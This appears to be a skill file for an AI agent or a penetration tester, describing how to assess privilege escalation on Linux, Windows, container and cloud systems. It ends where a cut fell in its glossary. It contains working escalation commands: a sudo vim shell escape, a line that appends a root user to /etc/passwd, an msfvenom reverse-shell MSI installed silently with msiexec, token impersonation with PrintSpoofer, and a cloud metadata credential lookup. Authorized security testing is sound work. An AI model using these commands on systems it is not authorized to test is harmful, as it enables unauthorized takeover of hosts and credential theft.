performing-privilege-escalation-assessment

What this skill does

# Performing Privilege Escalation Assessment

## When to Use

- After gaining initial low-privilege access during a penetration test to demonstrate full system compromise
- Assessing the security hardening of Linux and Windows servers against local privilege escalation attacks
- Evaluating whether endpoint detection and response (EDR) tools detect common privilege escalation techniques
- Testing the effectiveness of least-privilege policies and application whitelisting on endpoints
- Validating that container breakout and VM escape controls are properly configured

**Do not use** without written authorization, against production systems where exploitation could cause downtime, or for deploying kernel exploits on systems without prior approval and rollback capability.

## Prerequisites

- Low-privilege shell access (reverse shell, SSH, RDP) to the target system obtained through authorized means
- Privilege escalation enumeration scripts: linPEAS (Linux), winPEAS (Windows), Linux Smart Enumeration (LSE)
- Compiled kernel exploits for common CVEs or access to compilation tools on the target
- GTFOBins reference for Linux SUID/sudo binary abuse and LOLBAS reference for Windows living-off-the-land binaries
- Precompiled post-exploitation binaries for the target architecture if compilation is not available on the target

## Workflow

### Step 1: System Enumeration

Gather comprehensive information about the target system:

**Linux Enumeration:**
- `id && whoami` - Current user and group memberships
- `uname -a` - Kernel version for kernel exploit identification
- `cat /etc/os-release` - Distribution and version
- `sudo -l` - Commands the current user can run as root via sudo
- `find / -perm -4000 -type f 2>/dev/null` - SUID binaries
- `find / -perm -2000 -type f 2>/dev/null` - SGID binaries
- `crontab -l && ls -la /etc/cron*` - Scheduled tasks running as root
- `ps aux | grep root` - Processes running as root
- `cat /etc/passwd` - User accounts (look for additional users with UID 0)
- `find / -writable -type d 2>/dev/null` - World-writable directories
- Run `linpeas.sh` for automated comprehensive enumeration

**Windows Enumeration:**
- `whoami /priv` - Current user privileges (look for SeImpersonatePrivilege, SeDebugPrivilege)
- `systeminfo` - OS version, hotfix level, architecture
- `wmic service get name,pathname,startmode` - Unquoted service paths
- `icacls "C:\Program Files" /T` - Writable directories in Program Files
- `reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated` - AlwaysInstallElevated check
- `cmdkey /list` - Stored Windows credentials
- `schtasks /query /fo LIST /v` - Scheduled tasks with their run-as accounts
- Run `winPEAS.exe` for automated comprehensive enumeration

### Step 2: Linux Privilege Escalation Vectors

Test identified escalation vectors systematically:

- **Sudo misconfigurations**: If `sudo -l` shows entries like `(ALL) NOPASSWD: /usr/bin/vim`, use GTFOBins to escalate:
  - `sudo vim -c ':!/bin/bash'` to spawn a root shell
  - Common dangerous sudo entries: vim, less, find, nmap, python, perl, ruby, awk, env
- **SUID binary abuse**: If a SUID binary is identified that allows arbitrary command execution, shell escape, or file read:
  - Custom SUID: Check if a custom SUID binary calls other programs without absolute paths (PATH injection)
  - Known SUID: Check GTFOBins for exploitation of standard SUID binaries
- **Cron job exploitation**: If a cron job runs a script writable by the current user, or runs a script from a writable directory:
  - Modify the script to add a reverse shell or SUID copy of bash
  - PATH-based cron exploitation: if the cron job calls a command without absolute path and PATH is writable
- **Kernel exploits**: Match the kernel version to known exploits:
  - DirtyPipe (CVE-2022-0847): Linux kernel 5.8-5.16.11
  - DirtyCow (CVE-2016-5195): Linux kernel 2.6.22-4.8.3
  - PwnKit (CVE-2021-4034): Polkit pkexec vulnerability affecting most Linux distributions
- **Capabilities abuse**: `getcap -r / 2>/dev/null` to find binaries with elevated capabilities (cap_setuid, cap_dac_override)
- **Writable /etc/passwd**: If /etc/passwd is writable, add a new root user: `echo 'newroot:$1$hash:0:0::/root:/bin/bash' >> /etc/passwd`

### Step 3: Windows Privilege Escalation Vectors

Test Windows-specific escalation paths:

- **Token impersonation**: If the user has `SeImpersonatePrivilege` (common for service accounts and IIS):
  - Use `JuicyPotato.exe`, `PrintSpoofer.exe`, or `GodPotato.exe` to impersonate SYSTEM
  - `PrintSpoofer.exe -i -c "cmd /c whoami"` -> `NT AUTHORITY\SYSTEM`
- **Unquoted service paths**: If a service has an unquoted path with spaces (e.g., `C:\Program Files\My App\service.exe`) and you can write to an intermediate directory:
  - Place a malicious executable at `C:\Program Files\My.exe` which will execute when the service restarts
- **Writable service binaries**: If you can modify the executable of a service running as SYSTEM:
  - Replace the binary with a reverse shell and restart the service
- **AlwaysInstallElevated**: If both HKLM and HKCU AlwaysInstallElevated registry keys are set to 1:
  - Generate a malicious MSI: `msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f msi -o shell.msi`
  - Install with elevated privileges: `msiexec /quiet /qn /i shell.msi`
- **Stored credentials**: Check for credentials in `cmdkey /list`, AutoLogon registry keys, unattend.xml, web.config files, and PowerShell history
- **DLL hijacking**: Identify services that load DLLs from writable directories. Use Process Monitor to find missing DLL loads, then place a malicious DLL.
- **Scheduled tasks**: Find tasks running as SYSTEM with writable scripts or binaries

### Step 4: Container and Cloud Escalation

Test for escalation paths in containerized and cloud environments:

- **Docker breakout**: Check if the container runs in privileged mode (`--privileged`), has the Docker socket mounted (`/var/run/docker.sock`), or has `SYS_ADMIN` capability
- **Kubernetes pod escalation**: Check for service account tokens with cluster-admin rights, hostPID/hostNetwork namespaces, or hostPath volume mounts
- **Cloud metadata**: Access cloud instance metadata from compromised hosts (`http://169.254.169.254/latest/meta-data/`) to discover IAM roles, credentials, and instance information
- **IAM role abuse**: If cloud credentials are discovered, enumerate IAM permissions and test for privilege escalation through IAM policy manipulation

### Step 5: Documentation and Impact Assessment

Document the complete escalation path and business impact:

- Record every command executed during escalation with timestamps
- Capture proof of elevated access (whoami showing root/SYSTEM, accessing restricted files)
- Document what data or systems become accessible at the elevated privilege level
- Map the escalation technique to MITRE ATT&CK (T1548 - Abuse Elevation Control Mechanism, T1068 - Exploitation for Privilege Escalation)
- Provide specific remediation for each identified escalation vector

## Key Concepts

| Term | Definition |
|------|------------|
| **SUID Binary** | A Linux binary with the Set User ID bit enabled, which executes with the file owner's privileges (typically root) regardless of who runs it |
| **SeImpersonatePrivilege** | A Windows privilege that allows a process to impersonate another user's security token, commonly abused by service accounts to escalate to SYSTEM |
| **Kernel Exploit** | An exploit targeting a vulnerability in the operating system kernel to gain ring-0 or root/SYSTEM-level access |
| **GTFOBins** | A curated list of Unix binaries that can be exploited for privilege escalation, file read/write, or shell escape when misconfigured |
| **LOLBAS** | Living Off The Land Binaries and Scripts; legitimate Windows binaries that can be abused for code execution, file operations, or persistence |
| **DLL Hijacking** | Exploiting the DLL search order on Windows to lo